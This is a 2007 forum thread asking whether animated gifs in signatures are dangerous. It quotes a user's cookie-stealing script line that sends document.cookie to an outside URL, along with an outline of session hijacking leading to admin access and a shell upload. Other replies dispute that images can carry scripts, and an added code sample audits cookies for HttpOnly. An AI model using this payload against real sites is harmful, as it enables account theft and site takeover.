animated gifs dangerous?

Started by jbryant, January 17, 2007, 05:41:23 AM


jbryant

Is it true that allowing animated gifs in the signature or avatar is dangerous?

This was posted on my forum by one of my more experienced foreign users:


<"script>window.location('http://www.mysite/cookie.php?c=' + document.cookie)</script">

this is something that could be implemented into a gif pic or as swf flash animated thing ... this will steal the cookie of people who visit the page that the pic is in ...

if you don't know what a cookie is ... or how it is used to hack accounts ... try this


login to the forum
after you login
in the address bar (url bar) wipe everything and write
javascript:alert(document.cookie)

you will get a pop up window with stuff in it ...
one is SMF*** or something ...
if i got that for any user
i can use inline javascript to change my user to the user i got his cookie ...
that means his personal stuff will no longer be personal ... and if an admin visited the page with the gif or the swf ...

admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

that's if the hacker was a smart one and wanted to do that

why do you think that scripts are not allowed in forums and stuff like that?

cause it's soooooooooo much danger.




How do I disable the gif in the signature if this is true?
Thank you in advance.
Check out our live cam community....WaynesvilleLive.com
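
An added example, not part of the original thread: the `javascript:alert(document.cookie)` test quoted above shows exactly the cookies that page script can read. This sketch audits a site's `Set-Cookie` response headers and lists the cookies sent without `HttpOnly`, which are the ones `document.cookie` exposes; the cookie names and values are constructed for illustration.

```javascript
// Added example: find cookies that page script could read via document.cookie.
// A cookie set with the HttpOnly attribute is withheld from document.cookie.

// Parse one Set-Cookie header value into its name, value and security flags.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? '' : pair.slice(0, eq),
    value: eq === -1 ? pair : pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    const key = k.trim().toLowerCase(); // attribute names are case-insensitive
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = v.trim().toLowerCase();
  }
  return cookie;
}

// Names of cookies that lack HttpOnly and are therefore readable by script.
function scriptReadable(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.httpOnly).map((c) => c.name);
}

// The string document.cookie would return for these headers.
function documentCookieView(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample headers (hypothetical names and values).
const SAMPLE_HEADERS = [
  'forum_session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'forum_login=deadbeef; Path=/',
  'theme=dark; Path=/',
];

console.log('script-readable cookies:', scriptReadable(SAMPLE_HEADERS));
console.log('document.cookie view:', documentCookieView(SAMPLE_HEADERS));
```

Any login or session cookie that shows up in the script-readable list is a candidate for the `HttpOnly` attribute.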

Dannii

Animated gifs aren't any more dangerous than any other type of image, and I'm pretty sure that the risk is extremely low. You can't embed a script in an image like that.
"Never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise."

Daniel15

You can not embed a script in an image! An image is just that: An image. It can't contain anything else.

As far as I know, Flash itself can not read your cookies, it needs a separate JavaScript to do so (I could be wrong, though)

Quote: "admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

that's if the hacker was a smart one and wanted to do that"

Sounds like a script kiddie to me :-\
Daniel15, former Customisation team member, resigned due to lack of time. I still love everyone here :D.
Go to smfshop.com for SMFshop support, do NOT email or PM me!